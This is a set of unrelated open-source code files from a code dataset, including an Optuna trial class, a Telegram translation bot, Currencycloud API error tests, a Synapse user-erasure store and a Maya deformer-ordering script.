acf6b0acf09d585d9c9e1d3921076623254b4ad0 | 7,018 | py | Python | boexplain/optuna/optuna/trial/_frozen.py | sfu-db/BOExplain | a933badd9af1e039579927e41233f824c59db3f8 | [
"MIT"
] | 8 | 2021-02-15T09:21:17.000Z | 2021-12-21T20:37:21.000Z | boexplain/optuna/optuna/trial/_frozen.py | sfu-db/BOExplain | a933badd9af1e039579927e41233f824c59db3f8 | [
"MIT"
] | null | null | null | boexplain/optuna/optuna/trial/_frozen.py | sfu-db/BOExplain | a933badd9af1e039579927e41233f824c59db3f8 | [
"MIT"
] | 2 | 2021-02-15T09:17:35.000Z | 2021-06-21T16:50:58.000Z | import datetime
import warnings
# from optuna import distributions
# from optuna import logging
# from optuna.trial._state import TrialState
from .. import distributions
from .. import logging
from ._state import TrialState
_logger = logging.get_logger(__name__)
class FrozenTrial(object):
"""Status and results of a :class:`~optuna.trial.Trial`.
Attributes:
number:
Unique and consecutive number of :class:`~optuna.trial.Trial` for each
:class:`~optuna.study.Study`. Note that this field uses zero-based numbering.
state:
:class:`TrialState` of the :class:`~optuna.trial.Trial`.
value:
Objective value of the :class:`~optuna.trial.Trial`.
datetime_start:
Datetime where the :class:`~optuna.trial.Trial` started.
datetime_complete:
Datetime where the :class:`~optuna.trial.Trial` finished.
params:
Dictionary that contains suggested parameters.
user_attrs:
Dictionary that contains the attributes of the :class:`~optuna.trial.Trial` set with
:func:`optuna.trial.Trial.set_user_attr`.
intermediate_values:
Intermediate objective values set with :func:`optuna.trial.Trial.report`.
"""
    def __init__(
        self,
        number,  # type: int
        state,  # type: TrialState
        value,  # type: Optional[float]
        datetime_start,  # type: Optional[datetime.datetime]
        datetime_complete,  # type: Optional[datetime.datetime]
        params,  # type: Dict[str, Any]
        distributions,  # type: Dict[str, BaseDistribution]
        user_attrs,  # type: Dict[str, Any]
        system_attrs,  # type: Dict[str, Any]
        intermediate_values,  # type: Dict[int, float]
        trial_id,  # type: int
    ):
        # type: (...) -> None
        """Store the trial snapshot verbatim; no validation happens here
        (see :meth:`_validate`)."""
        self.number = number
        self.state = state
        self.value = value
        self.datetime_start = datetime_start
        self.datetime_complete = datetime_complete
        self.params = params
        self.user_attrs = user_attrs
        self.system_attrs = system_attrs
        self.intermediate_values = intermediate_values
        # Kept private: exposed through the ``distributions`` property and
        # the deprecated ``trial_id`` property respectively.
        self._distributions = distributions
        self._trial_id = trial_id
# Ordered list of fields required for `__repr__`, `__hash__` and dataframe creation.
# TODO(hvy): Remove this list in Python 3.6 as the order of `self.__dict__` is preserved.
_ordered_fields = [
"number",
"value",
"datetime_start",
"datetime_complete",
"params",
"_distributions",
"user_attrs",
"system_attrs",
"intermediate_values",
"_trial_id",
"state",
]
def __eq__(self, other):
# type: (Any) -> bool
if not isinstance(other, FrozenTrial):
return NotImplemented
return other.__dict__ == self.__dict__
def __lt__(self, other):
# type: (Any) -> bool
if not isinstance(other, FrozenTrial):
return NotImplemented
return self.number < other.number
def __le__(self, other):
# type: (Any) -> bool
if not isinstance(other, FrozenTrial):
return NotImplemented
return self.number <= other.number
    def __hash__(self):
        # type: () -> int
        # NOTE(review): several ordered fields (params, user_attrs,
        # system_attrs, intermediate_values) are dicts, so this raises
        # TypeError whenever those hold real data -- confirm whether
        # FrozenTrial is ever actually used as a dict key / set member.
        return hash(tuple(getattr(self, field) for field in self._ordered_fields))
def __repr__(self):
# type: () -> str
return "{cls}({kwargs})".format(
cls=self.__class__.__name__,
kwargs=", ".join(
"{field}={value}".format(
field=field if not field.startswith("_") else field[1:],
value=repr(getattr(self, field)),
)
for field in self._ordered_fields
),
)
    def _validate(self):
        # type: () -> None
        """Raise ``ValueError`` when the trial snapshot is internally
        inconsistent (timestamps vs. state, value vs. COMPLETE state, and
        params vs. their distributions)."""
        if self.datetime_start is None:
            raise ValueError("`datetime_start` is supposed to be set.")
        # Finished trials must carry a completion timestamp; running ones must not.
        if self.state.is_finished():
            if self.datetime_complete is None:
                raise ValueError("`datetime_complete` is supposed to be set for a finished trial.")
        else:
            if self.datetime_complete is not None:
                raise ValueError(
                    "`datetime_complete` is supposed to be None for an unfinished trial."
                )
        if self.state == TrialState.COMPLETE and self.value is None:
            raise ValueError("`value` is supposed to be set for a complete trial.")
        # Every suggested parameter needs a distribution and vice versa.
        if set(self.params.keys()) != set(self.distributions.keys()):
            raise ValueError(
                "Inconsistent parameters {} and distributions {}.".format(
                    set(self.params.keys()), set(self.distributions.keys())
                )
            )
        # Each parameter value must lie inside its distribution's support.
        for param_name, param_value in self.params.items():
            distribution = self.distributions[param_name]
            param_value_in_internal_repr = distribution.to_internal_repr(param_value)
            if not distribution._contains(param_value_in_internal_repr):
                raise ValueError(
                    "The value {} of parameter '{}' isn't contained in the distribution "
                    "{}.".format(param_value, param_name, distribution)
                )
    @property
    def distributions(self):
        # type: () -> Dict[str, BaseDistribution]
        """Dictionary that contains the distributions of :attr:`params`."""
        return self._distributions
    @distributions.setter
    def distributions(self, value):
        # type: (Dict[str, BaseDistribution]) -> None
        # NOTE(review): kept writable, presumably so storages can attach
        # distributions after construction -- confirm against callers.
        self._distributions = value
@property
def trial_id(self):
# type: () -> int
"""Return the trial ID.
.. deprecated:: 0.19.0
The direct use of this attribute is deprecated and it is recommended that you use
:attr:`~optuna.trial.FrozenTrial.number` instead.
Returns:
The trial ID.
"""
warnings.warn(
"The use of `FrozenTrial.trial_id` is deprecated. "
"Please use `FrozenTrial.number` instead.",
DeprecationWarning,
)
_logger.warning(
"The use of `FrozenTrial.trial_id` is deprecated. "
"Please use `FrozenTrial.number` instead."
)
return self._trial_id
@property
def last_step(self):
# type: () -> Optional[int]
if len(self.intermediate_values) == 0:
return None
else:
return max(self.intermediate_values.keys())
@property
def duration(self):
# type: () -> Optional[datetime.timedelta]
"""Return the elapsed time taken to complete the trial.
Returns:
The duration.
"""
if self.datetime_start and self.datetime_complete:
return self.datetime_complete - self.datetime_start
else:
return None
| 32.045662 | 99 | 0.589057 |
acf6b158461c07800e6586f89c5e5d3d9c02b46d | 11,561 | py | Python | plugins/translate.py | darkmanrandy/Google_Translater_V2 | 21c23153d4f84ce762497df69e4dc3113abf077d | [
"Apache-2.0"
] | null | null | null | plugins/translate.py | darkmanrandy/Google_Translater_V2 | 21c23153d4f84ce762497df69e4dc3113abf077d | [
"Apache-2.0"
] | null | null | null | plugins/translate.py | darkmanrandy/Google_Translater_V2 | 21c23153d4f84ce762497df69e4dc3113abf077d | [
"Apache-2.0"
] | null | null | null | from googletrans import Translator
from pyrogram import Client, filters
from pyrogram.types import (
InlineKeyboardButton,
InlineKeyboardMarkup
)
from helper.database import find , insert
@Client.on_message(filters.private & filters.command(['start']))
async def start(client, message):
    """Handle /start: register the chat in the database and greet the user."""
    insert(int(message.chat.id))
    buttons = InlineKeyboardMarkup(
        [ [ InlineKeyboardButton("Support 🇮🇳" ,url="https://t.me/tharamaanateambot") ],[InlineKeyboardButton("Subscribe 🧐", url="https://t.me/tendkotta") ] ] )
    await message.reply_text(
        text =f"Hello **{message.from_user.first_name }** \n\n __I am simple Google Translater Bot \n I can translate any language to you selected language__",
        reply_to_message_id = message.message_id,
        reply_markup=buttons )
@Client.on_message(filters.private & filters.text )
async def echo(client, message):
    """Translate incoming text to the chat's saved language, or show the
    language-selection keyboard when no language is stored yet.

    NOTE(review): a new googletrans Translator is created per message and
    translation errors are unhandled — presumably acceptable for this bot;
    confirm before hardening.
    """
    # First page of the language keyboard; callback_data carries the ISO code.
    keybord1= InlineKeyboardMarkup( [
        [
        InlineKeyboardButton("Tamil", callback_data='ta'),
        InlineKeyboardButton("Albanian", callback_data='sq'),
        InlineKeyboardButton("Amharic",callback_data ='am'),
        ],
        [ InlineKeyboardButton("Arabic", callback_data='ar'),
        InlineKeyboardButton("Armenian", callback_data='hy'),
        InlineKeyboardButton("Azerbaijani",callback_data = 'az'),
        ],
        [InlineKeyboardButton("Basque",callback_data ="eu"),
        InlineKeyboardButton("Belarusian",callback_data ="be"),
        InlineKeyboardButton("Bengali",callback_data="bn")],
        [InlineKeyboardButton("Bosnian",callback_data = "bs"),
        InlineKeyboardButton("Bulgarian",callback_data ="bg"),
        InlineKeyboardButton("Catalan",callback_data = "ca")
        ],
        [
        InlineKeyboardButton("Corsican",callback_data ="co"),
        InlineKeyboardButton("Croatian",callback_data = "hr"),
        InlineKeyboardButton("Czech", callback_data = "cs"),
        ],
        [ InlineKeyboardButton("Danish",callback_data = "da"),
        InlineKeyboardButton("Dutch",callback_data = "nl"),
        InlineKeyboardButton("Esperanto",callback_data = "eo"),
        ],
        [InlineKeyboardButton(" Next --->",callback_data = "page2")
        ]
        ] )
    # Stored target-language code for this chat, if the user picked one.
    code =find(int(message.chat.id))
    if code :
        translator = Translator()
        translation = translator.translate(message.text,dest = code)
        await message.reply_text(translation.text)
    else:
        await message.reply_text("Select language 👇",reply_to_message_id = message.message_id, reply_markup =keybord1)
@Client.on_callback_query()
async def translate_text(bot,update):
    """Handle all inline-keyboard callbacks.

    ``pageN`` callbacks switch between the six language-selection pages;
    any other callback data is treated as a Google Translate language code
    and the replied-to message text is translated to it.

    NOTE(review): this rebuilds all six keyboards on every callback and
    duplicates the page-1 keyboard from ``echo`` — candidates for a shared
    module-level constant.
    """
    # Page 1 (duplicated from echo so "Back" from page 2 works here too).
    keybord1= InlineKeyboardMarkup( [
        [
        InlineKeyboardButton("Tamil", callback_data='ta'),
        InlineKeyboardButton("Albanian", callback_data='sq'),
        InlineKeyboardButton("Amharic",callback_data ='am'),
        ],
        [ InlineKeyboardButton("Arabic", callback_data='ar'),
        InlineKeyboardButton("Armenian", callback_data='hy'),
        InlineKeyboardButton("Azerbaijani",callback_data = 'az'),
        ],
        [InlineKeyboardButton("Basque",callback_data ="eu"),
        InlineKeyboardButton("Belarusian",callback_data ="be"),
        InlineKeyboardButton("Bengali",callback_data="bn")],
        [InlineKeyboardButton("Bosnian",callback_data = "bs"),
        InlineKeyboardButton("Bulgarian",callback_data ="bg"),
        InlineKeyboardButton("Catalan",callback_data = "ca")
        ],
        [
        InlineKeyboardButton("Corsican",callback_data ="co"),
        InlineKeyboardButton("Croatian",callback_data = "hr"),
        InlineKeyboardButton("Czech", callback_data = "cs"),
        ],
        [ InlineKeyboardButton("Danish",callback_data = "da"),
        InlineKeyboardButton("Dutch",callback_data = "nl"),
        InlineKeyboardButton("Esperanto",callback_data = "eo"),
        ],
        [InlineKeyboardButton(" Next --->",callback_data = "page2")
        ]
        ] )
    # Page 2.
    keybord2= InlineKeyboardMarkup([
        [InlineKeyboardButton("English",callback_data = "en"),
        InlineKeyboardButton("Estonian",callback_data = "et"),
        InlineKeyboardButton("Finnish",callback_data = "fi")
        ],
        [InlineKeyboardButton("French",callback_data = "fr"),
        InlineKeyboardButton("Frisian",callback_data = "fy"),
        InlineKeyboardButton("Galician",callback_data = "gl")
        ],
        [InlineKeyboardButton("Georgian",callback_data = "ka"),
        InlineKeyboardButton("German",callback_data = "de"),
        InlineKeyboardButton("Greek",callback_data = "el")
        ],
        [InlineKeyboardButton("Gujarati",callback_data = "gu"),
        InlineKeyboardButton("Haitian Creole",callback_data = "ht"),
        InlineKeyboardButton("Hausa",callback_data ="ha")
        ],
        [InlineKeyboardButton("Hindi",callback_data = "hi"),
        InlineKeyboardButton("Hungarian",callback_data = "hu"),
        InlineKeyboardButton("Icelandic",callback_data = "is")
        ],
        [InlineKeyboardButton("Igbo",callback_data = "ig"),
        InlineKeyboardButton("Indonesian",callback_data = "id"),
        InlineKeyboardButton("Irish",callback_data = "ga")
        ],
        [InlineKeyboardButton("<--- Back",callback_data = "page1"),
        InlineKeyboardButton(" Next --->",callback_data = "page3"),
        ]
        ])
    # Page 3.
    keybord3 = InlineKeyboardMarkup([
        [ InlineKeyboardButton("Italian",callback_data = "it"),
        InlineKeyboardButton("Japanese",callback_data = "ja"),
        InlineKeyboardButton("Javanese",callback_data = "jv")
        ],
        [InlineKeyboardButton("Kannada",callback_data = "kn"),
        InlineKeyboardButton("Kazakh",callback_data = "kk"),
        InlineKeyboardButton("Khmer",callback_data = "km")
        ],
        [InlineKeyboardButton("Kinyarwanda",callback_data = "rw"),
        InlineKeyboardButton("Korean",callback_data ="ko"),
        InlineKeyboardButton("Kurdish",callback_data = "ku")
        ],
        [ InlineKeyboardButton("Kyrgyz",callback_data ="ky"),
        InlineKeyboardButton("Lao",callback_data = "lo"),
        InlineKeyboardButton("Latin",callback_data = "la")
        ],
        [InlineKeyboardButton("Latvian",callback_data = "lv"),
        InlineKeyboardButton('Lithuanian',callback_data ="lt"),
        InlineKeyboardButton("Luxembourgish",callback_data = "lb")
        ],
        [InlineKeyboardButton("Macedonian",callback_data = "mk"),
        InlineKeyboardButton("Malagasy",callback_data ="mg"),
        InlineKeyboardButton("Malay",callback_data ="ms")
        ],
        [InlineKeyboardButton("<--- Back",callback_data = "page2"),
        InlineKeyboardButton(" Next --->",callback_data = "page4")
        ]
        ])
    # Page 4.
    keybord4 = InlineKeyboardMarkup([
        [InlineKeyboardButton("Malayalam",callback_data = "ml"),
        InlineKeyboardButton("Maltese",callback_data = "mt"),
        InlineKeyboardButton("Maori",callback_data = "mi")
        ],
        [InlineKeyboardButton("Marathi",callback_data = "mr"),
        InlineKeyboardButton("Mongolian",callback_data = "mn"),
        InlineKeyboardButton("Myanmar (Burmese)",callback_data = "my")
        ],
        [InlineKeyboardButton("Nepali",callback_data ="ne"),
        InlineKeyboardButton("Norwegian",callback_data = "no"),
        InlineKeyboardButton("Nyanja (Chichewa)",callback_data = "ny")
        ],
        [InlineKeyboardButton("Odia",callback_data = "or"),
        InlineKeyboardButton("Pashto",callback_data = "ps"),
        InlineKeyboardButton("Persian",callback_data = "fa"),
        ],
        [InlineKeyboardButton("Polish",callback_data = "pl"),
        InlineKeyboardButton("Portuguese",callback_data = "pt"),
        InlineKeyboardButton("Punjabi",callback_data = "pa"),
        ],
        [InlineKeyboardButton("Romanian",callback_data = "ro"),
        InlineKeyboardButton("Russian",callback_data = "ru"),
        InlineKeyboardButton("Samoan",callback_data= "sm"),
        ],
        [InlineKeyboardButton("<--- Back",callback_data = "page3"),
        InlineKeyboardButton("Next --->",callback_data = "page5")
        ]
        ])
    # Page 5.
    keybord5 = InlineKeyboardMarkup([
        [InlineKeyboardButton("Scots Gaelic",callback_data = "gd"),
        InlineKeyboardButton("Serbian",callback_data = "sr"),
        InlineKeyboardButton("Sesotho",callback_data = "st")
        ],
        [InlineKeyboardButton("Shona",callback_data ="sn"),
        InlineKeyboardButton("Sindhi",callback_data ="sd"),
        InlineKeyboardButton("Sinhala (Sinhalese)",callback_data = "si")
        ],
        [InlineKeyboardButton("Slovak",callback_data = "sk"),
        InlineKeyboardButton("Slovenian",callback_data = "sl"),
        InlineKeyboardButton("Somali",callback_data = "so")
        ],
        [InlineKeyboardButton("Spanish",callback_data = "es"),
        InlineKeyboardButton("Sundanese",callback_data ="su"),
        InlineKeyboardButton("Swahili",callback_data ="sw")
        ],
        [InlineKeyboardButton("Swedish",callback_data = "sv"),
        InlineKeyboardButton("Tagalog (Filipino)",callback_data ='tl'),
        InlineKeyboardButton("Tajik",callback_data = "tg")
        ],
        [InlineKeyboardButton("Afrikaans",callback_data = "af"),
        InlineKeyboardButton("Tatar",callback_data = "tt"),
        InlineKeyboardButton("Telugu",callback_data = "te")
        ],
        [InlineKeyboardButton("<--- Back",callback_data = "page4"),
        InlineKeyboardButton("Next --->",callback_data = "page6")
        ] ])
    # Page 6 (last page: only a Back navigation button).
    keybord6 = InlineKeyboardMarkup([
        [InlineKeyboardButton("Thai",callback_data = "th"),
        InlineKeyboardButton("Turkish",callback_data = "tr"),
        InlineKeyboardButton("Turkmen",callback_data ="tk")
        ],
        [InlineKeyboardButton("Ukrainian",callback_data = "uk"),
        InlineKeyboardButton("Urdu",callback_data = "ur"),
        InlineKeyboardButton("Uyghur",callback_data ="ug")
        ],
        [InlineKeyboardButton("Uzbek",callback_data = "uz"),
        InlineKeyboardButton("Vietnamese",callback_data ="vi"),
        InlineKeyboardButton("Welsh",callback_data = "cy")
        ],
        [InlineKeyboardButton("Xhosa",callback_data = "xh"),
        InlineKeyboardButton("Yiddish",callback_data = "yi"),
        InlineKeyboardButton("Yoruba",callback_data = "yo")],
        [InlineKeyboardButton("<--- Back",callback_data = "page5")
        ] ])
    # Text of the message the keyboard was attached to (the user's original
    # message). NOTE(review): assumes reply_to_message is present — TODO
    # confirm this cannot be None for these callbacks.
    tr_text = update.message.reply_to_message.text
    cb_data = update.data
    # Navigation tokens swap the keyboard in place; anything else is a
    # language code and triggers the actual translation.
    if cb_data== "page2":
        await update.message.edit("Select language 👇",reply_markup = keybord2)
    elif cb_data == "page1":
        await update.message.edit("Select language 👇",reply_markup =keybord1)
    elif cb_data =="page3":
        await update.message.edit("Select language 👇",reply_markup =keybord3)
    elif cb_data == "page4":
        await update.message.edit("Select language 👇",reply_markup =keybord4)
    elif cb_data =="page5":
        await update.message.edit("Select language 👇",reply_markup =keybord5)
    elif cb_data =="page6":
        await update.message.edit("Select language 👇",reply_markup =keybord6)
    else :
        translator = Translator()
        translation = translator.translate(tr_text,dest = cb_data)
        await update.message.edit(translation.text)
| 43.958175 | 168 | 0.627714 |
acf6b2d493f136c6663d36ccfefb8b883d813e73 | 611 | py | Python | afterglow_core/errors/field_cal.py | JohnTorian/afterglow-core | e9dc0aa90e8ae84272ee686487acca8c16aa69b6 | [
"Apache-2.0"
] | null | null | null | afterglow_core/errors/field_cal.py | JohnTorian/afterglow-core | e9dc0aa90e8ae84272ee686487acca8c16aa69b6 | [
"Apache-2.0"
] | null | null | null | afterglow_core/errors/field_cal.py | JohnTorian/afterglow-core | e9dc0aa90e8ae84272ee686487acca8c16aa69b6 | [
"Apache-2.0"
] | null | null | null | """
Afterglow Core: photometric calibration errors (subcodes 40xx)
"""
from . import AfterglowError
__all__ = [
'DuplicateFieldCalError', 'UnknownFieldCalError',
]
class UnknownFieldCalError(AfterglowError):
    """
    Unknown field calibration.

    Raised when the requested field cal ID does not exist.

    Extra attributes::

        id: requested field cal ID
    """
    code = 404  # HTTP status: Not Found
    subcode = 4000
    message = 'Unknown field cal'
class DuplicateFieldCalError(AfterglowError):
    """
    Field cal with this name already exists.

    Raised when attempting to create a field cal whose name is taken.

    Extra attributes::

        name: field cal name
    """
    # HTTP status code is inherited from AfterglowError.
    subcode = 4001
    message = 'Duplicate field cal name'
acf6b2e503da487ee69b0417a5f86205cda1ab3c | 5,905 | py | Python | tests/integration/test_errors.py | icebotariccl/currencycloud-python | 03bb0df2743e6669790dee6f2367f9e0500a4610 | [
"MIT"
] | 12 | 2015-07-31T10:28:55.000Z | 2021-12-28T03:28:37.000Z | tests/integration/test_errors.py | icebotariccl/currencycloud-python | 03bb0df2743e6669790dee6f2367f9e0500a4610 | [
"MIT"
] | 26 | 2015-07-01T16:25:19.000Z | 2022-02-25T14:42:18.000Z | tests/integration/test_errors.py | icebotariccl/currencycloud-python | 03bb0df2743e6669790dee6f2367f9e0500a4610 | [
"MIT"
] | 20 | 2015-10-14T18:21:04.000Z | 2022-02-02T09:59:28.000Z | from betamax import Betamax
from currencycloud import Client, Config
from currencycloud.errors import AuthenticationError, BadRequestError, ForbiddenError, NotFoundError, TooManyRequestsError
class TestError:
    """Integration tests for the Currencycloud error hierarchy.

    HTTP interactions are replayed from Betamax cassettes, so the tests run
    offline against recorded responses.
    """

    def setup_method(self, method):
        # TODO: To run against real server please delete ../fixtures/vcr_cassettes/* and replace
        # login_id and api_key with valid credentials before running the tests
        login_id = 'development@currencycloud.com'
        api_key = 'deadbeefdeadbeefdeadbeefdeadbeefdeadbeefdeadbeefdeadbeefdeadbeef'
        environment = Config.ENV_DEMO
        self.client = Client(login_id, api_key, environment)

    def test_error_contains_full_details_for_api_error(self):
        """str(error) should include request, response and message details."""
        # Deliberately short (32-char) api_key to trigger a validation error.
        login_id = 'non-existent-login-id'
        api_key = 'deadbeefdeadbeefdeadbeefdeadbeef'
        tmp_client = Client(login_id, api_key, Config.ENV_DEMO)
        with Betamax(tmp_client.config.session) as betamax:
            betamax.use_cassette('errors/contains_full_details_for_api_error')
            error = None
            try:
                tmp_client.auth.authenticate()
                raise Exception("Should have failed")
            except BadRequestError as e:
                error = e
            assert error is not None
            expected_error_fields = [
                "login_id: non-existent-login-id",
                "api_key: " + api_key,
                "verb: post",
                "url: https://devapi.currencycloud.com/v2/authenticate/api",
                "status_code: 400",
                "date:",
                "request_id:",
                "field: api_key",
                "code: api_key_length_is_invalid",
                "message: api_key should be 64 character(s) long",
                "length: 64"
            ]
            # Every expected fragment must appear in the stringified error.
            error_str = str(error)
            missing = False
            for f in expected_error_fields:
                if f not in error_str:
                    missing = True
                    break
            assert missing is False

    def test_error_is_raised_on_incorrect_authentication_details(self):
        """Bad credentials should surface as AuthenticationError (401)."""
        login_id = 'non-existent-login-id'
        api_key = 'deadbeefdeadbeefdeadbeefdeadbeefdeadbeefdeadbeefdeadbeefdeadbeef'
        tmp_client = Client(login_id, api_key, Config.ENV_DEMO)
        with Betamax(tmp_client.config.session) as betamax:
            betamax.use_cassette('errors/is_raised_on_incorrect_authentication_details')
            error = None
            try:
                tmp_client.auth.authenticate()
                raise Exception("Should have failed")
            except AuthenticationError as e:
                error = e
            assert error.code == 'auth_failed'
            assert error.raw_response is not None
            assert error.status_code == 401
            assert len(error.messages) == 1
            error_message = error.messages[0]
            assert error_message.field == 'username'
            assert error_message.code == 'invalid_supplied_credentials'
            assert error_message.message == 'Authentication failed with the supplied credentials'  # noqa
            assert not error_message.params

    def test_error_is_raised_when_a_resource_is_not_found(self):
        """Fetching a missing beneficiary should raise NotFoundError (404)."""
        with Betamax(self.client.config.session) as betamax:
            betamax.use_cassette('errors/is_raised_when_a_resource_is_not_found')
            error = None
            try:
                self.client.beneficiaries.retrieve('081596c9-02de-483e-9f2a-4cf55dcdf98c')
                raise Exception("Should have failed")
            except NotFoundError as e:
                error = e
            assert error.code == 'beneficiary_not_found'
            assert error.raw_response is not None
            assert error.status_code == 404
            assert len(error.messages) == 1
            error_message = error.messages[0]
            assert error_message.field == 'id'
            assert error_message.code == 'beneficiary_not_found'
            assert error_message.message == 'Beneficiary was not found for this id'  # noqa
            assert not error_message.params

    def test_error_is_raised_when_too_many_requests_have_been_issued(self):
        """Rate limiting should surface as TooManyRequestsError (429)."""
        with Betamax(self.client.config.session) as betamax:
            betamax.use_cassette('errors/is_raised_when_too_many_requests_have_been_issued')
            error = None
            try:
                self.client.auth.authenticate()
                raise Exception("Should have failed")
            except TooManyRequestsError as e:
                error = e
            assert error.code == 'too_many_requests'
            assert error.raw_response is not None
            assert error.status_code == 429
            assert len(error.messages) == 1
            error_message = error.messages[0]
            assert error_message.field == 'base'
            assert error_message.code == 'too_many_requests'
            assert error_message.message == 'Too many requests have been made to the api. Please refer to the Developer Center for more information'  # noqa
            assert not error_message.params

    def test_error_is_raised_on_forbidden_request(self):
        """Missing permissions should surface as ForbiddenError (403)."""
        with Betamax(self.client.config.session) as betamax:
            betamax.use_cassette('errors/is_raised_on_forbidden_request')
            error = None
            try:
                self.client.transfers.find()
                raise Exception("Should have failed")
            except ForbiddenError as e:
                error = e
            assert error.code == 'permission_denied'
            assert error.raw_response is not None
            assert error.status_code == 403
            assert len(error.messages) == 1
            error_message = error.messages[0]
            assert error_message.code == 'permission_denied'
            assert error_message.message == "You do not have permission 'transfer_read' to perform this operation"
            assert not error_message.params
| 40.170068 | 156 | 0.632684 |
acf6b2fb643d59411ed1e191d03cb09689d11986 | 3,698 | py | Python | synapse/storage/databases/main/user_erasure_store.py | jklippel/synapse | 451f25172afc0ce46e416c73fa703c5edf279d54 | [
"Apache-2.0"
] | null | null | null | synapse/storage/databases/main/user_erasure_store.py | jklippel/synapse | 451f25172afc0ce46e416c73fa703c5edf279d54 | [
"Apache-2.0"
] | 1 | 2021-05-13T17:27:16.000Z | 2021-05-19T14:38:32.000Z | synapse/storage/databases/main/user_erasure_store.py | jklippel/synapse | 451f25172afc0ce46e416c73fa703c5edf279d54 | [
"Apache-2.0"
] | null | null | null | # Copyright 2018 New Vector Ltd
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
from synapse.storage._base import SQLBaseStore
from synapse.util.caches.descriptors import cached, cachedList
class UserErasureWorkerStore(SQLBaseStore):
    """Read-only store for querying which users have requested erasure.

    Results are cached per user id; the companion ``UserErasureStore``
    invalidates the cache when erasure state changes.
    """

    @cached()
    async def is_user_erased(self, user_id: str) -> bool:
        """
        Check if the given user id has requested erasure

        Args:
            user_id: full user id to check

        Returns:
            True if the user has requested erasure
        """
        # A row in erased_users means the user requested erasure; we only
        # need existence, so select a constant column.
        result = await self.db_pool.simple_select_onecol(
            table="erased_users",
            keyvalues={"user_id": user_id},
            retcol="1",
            desc="is_user_erased",
        )
        return bool(result)

    @cachedList(cached_method_name="is_user_erased", list_name="user_ids")
    async def are_users_erased(self, user_ids):
        """
        Checks which users in a list have requested erasure

        Args:
            user_ids (iterable[str]): full user id to check

        Returns:
            dict[str, bool]:
                for each user, whether the user has requested erasure.
        """
        # this serves the dual purpose of (a) making sure we can do len and
        # iterate it multiple times, and (b) avoiding duplicates.
        user_ids = tuple(set(user_ids))
        rows = await self.db_pool.simple_select_many_batch(
            table="erased_users",
            column="user_id",
            iterable=user_ids,
            retcols=("user_id",),
            desc="are_users_erased",
        )
        erased_users = {row["user_id"] for row in rows}
        # Map every requested id to a bool, including those with no row.
        return {u: u in erased_users for u in user_ids}
class UserErasureStore(UserErasureWorkerStore):
    """Writable store: mark users as erased / not erased.

    Both operations are idempotent and invalidate the ``is_user_erased``
    cache within the same transaction.
    """

    async def mark_user_erased(self, user_id: str) -> None:
        """Indicate that user_id wishes their message history to be erased.

        Args:
            user_id: full user_id to be erased
        """

        def f(txn):
            # first check if they are already in the list
            txn.execute("SELECT 1 FROM erased_users WHERE user_id = ?", (user_id,))
            if txn.fetchone():
                return

            # they are not already there: do the insert.
            txn.execute("INSERT INTO erased_users (user_id) VALUES (?)", (user_id,))

            # Invalidate the cached lookup so readers see the new state.
            self._invalidate_cache_and_stream(txn, self.is_user_erased, (user_id,))

        await self.db_pool.runInteraction("mark_user_erased", f)

    async def mark_user_not_erased(self, user_id: str) -> None:
        """Indicate that user_id is no longer erased.

        Args:
            user_id: full user_id to be un-erased
        """

        def f(txn):
            # first check if they are already in the list
            txn.execute("SELECT 1 FROM erased_users WHERE user_id = ?", (user_id,))
            if not txn.fetchone():
                return

            # They are there, delete them.
            self.db_pool.simple_delete_one_txn(
                txn, "erased_users", keyvalues={"user_id": user_id}
            )

            # Invalidate the cached lookup so readers see the new state.
            self._invalidate_cache_and_stream(txn, self.is_user_erased, (user_id,))

        await self.db_pool.runInteraction("mark_user_not_erased", f)
acf6b3545353fff0b3f8593a86cc17166cb8e257 | 822 | py | Python | post_script_deformation_order_import.py | tokejepsen/mgear_scripts | 10254ce9cced28fc5cd8b94b34a881ca7075b7d1 | [
"MIT"
] | null | null | null | post_script_deformation_order_import.py | tokejepsen/mgear_scripts | 10254ce9cced28fc5cd8b94b34a881ca7075b7d1 | [
"MIT"
] | null | null | null | post_script_deformation_order_import.py | tokejepsen/mgear_scripts | 10254ce9cced28fc5cd8b94b34a881ca7075b7d1 | [
"MIT"
] | null | null | null | """
Deformation Order json file schema:
[
{
"node": "body_animation",
"order": [
"deltaMush1",
"skinCluster12"
]
}
]
NOTE: Only the inputs that needs changing should be included in the order.
"""
import os
import json
import pymel.core as pc
basename = os.path.basename(pc.sceneName())
filename = os.path.splitext(basename)[0]
directory = os.path.dirname(pc.sceneName())
# Find "{current file name}/deformation_order.json"
path = os.path.join(directory, filename, "deformation_order.json")
targets = []
if os.path.exists(path):
with open(path, "r") as f:
for data in json.load(f):
order = data["order"]
order.append(data["node"])
print("Processing {}".format(data["node"]))
pc.reorderDeformers(order)
| 23.485714 | 74 | 0.615572 |
acf6b366d1eedf32dc388325cbc42b9ddc6e1fda | 346 | py | Python | CreationalPatterns/Prototype.py | hexinatgithub/DesignPatterns | de0122b2c3df34b60e100cd0c8871c83a754117c | [
"MIT"
] | null | null | null | CreationalPatterns/Prototype.py | hexinatgithub/DesignPatterns | de0122b2c3df34b60e100cd0c8871c83a754117c | [
"MIT"
] | null | null | null | CreationalPatterns/Prototype.py | hexinatgithub/DesignPatterns | de0122b2c3df34b60e100cd0c8871c83a754117c | [
"MIT"
] | null | null | null | """
Specify the kinds of objects to create using a prototypical instance,
and create new objects by copying this prototype.
"""
import copy
class Prototype:
    """
    Example class to be copied.

    Stands in for any object whose construction is expensive; clients clone
    an existing instance instead of instantiating from scratch.
    """
    pass
def main():
    """Demonstrate the Prototype pattern: clone an instance with deepcopy."""
    original = Prototype()
    clone = copy.deepcopy(original)
if __name__ == "__main__":
main()
| 14.416667 | 69 | 0.66763 |
acf6b3fe7777b4aa4b5ebe343272ae69e712e3ec | 36,838 | py | Python | tests/test_core.py | audetto/python-diskcache | 8ba1d34972835a143bedda5927b4cdca338c2ebf | [
"Apache-2.0"
] | null | null | null | tests/test_core.py | audetto/python-diskcache | 8ba1d34972835a143bedda5927b4cdca338c2ebf | [
"Apache-2.0"
] | null | null | null | tests/test_core.py | audetto/python-diskcache | 8ba1d34972835a143bedda5927b4cdca338c2ebf | [
"Apache-2.0"
] | null | null | null | "Test diskcache.core.Cache."
from __future__ import print_function
import collections as co
import errno
